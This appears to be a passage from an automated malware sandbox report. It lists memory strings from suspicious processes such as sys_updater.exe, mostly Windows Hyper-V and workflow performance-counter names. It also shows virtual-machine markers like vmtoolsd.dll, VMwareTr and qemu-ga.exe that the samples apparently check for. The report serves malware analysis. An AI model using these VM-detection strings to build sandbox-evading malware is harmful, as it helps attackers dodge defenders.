                            Source: sys_updater.exe, 00000022.00000003.2930228516.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2935332753.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2925919889.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2934420769.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2935892757.00000237D3262000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cac
                            Source: sys_updater.exe, 00000022.00000000.2519363810.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmpBinary or memory string: vmsrvc.eM1
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processordll
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionM
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes86
                            Source: sys_updater.exe, 00000022.00000003.2927093740.00000237D309E000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2923163784.00000237D3099000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hyp
                            Source: sys_updater.exe, 00000022.00000003.2922988922.00000237D309F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec5082Page Table Resets/sec5084Page Table Validations/sec
                            Source: sys_updater.exe, 00000022.00000000.2519363810.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmpBinary or memory string: VMwareTrM1
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root PartitionfUmk
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processort
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2152848590.00000234D4103000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2637181998.0000021E0170C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
                            Source: explert.exe, 00000003.00000002.1679510345.000000000102E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd.dllM
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service`
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V qbqdsitfxsrfbfn Busv
                            Source: sys_updater.exe, 00000022.00000003.2893122685.00000237D30A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
                            Source: sys_updater.exe, 00000022.00000003.2893714166.00000237D3087000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: quence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switc
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
                            Source: sys_updater.exe, 00000022.00000003.2930228516.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2935332753.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2925919889.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2934420769.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2935892757.00000237D3262000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot con@@+
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe`,fq
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2139747550.00000234D400A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800M3
                            Source: sys_updater.exe, 00000022.00000003.2927093740.00000237D309A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: evice pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Costde i
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual ProcessorD
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service8{P!
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor:
                            Source: sys_updater.exe, 00000018.00000003.2636536344.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2649797077.0000021E03001000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2635893367.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2648769571.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2645299246.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2636092629.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2635568445.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2648562867.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2647420360.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2637859660.0000021E03058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: me3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytesgg
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processore%
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionTFh
                            Source: sys_updater.exe, 0000001F.00000003.2806925063.0000020E47BC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discoveries9610Hosted Cache: Segment offers queue size9612Publication Cache: Published contents9614Local Cache: Average access time3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytes?
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionmun
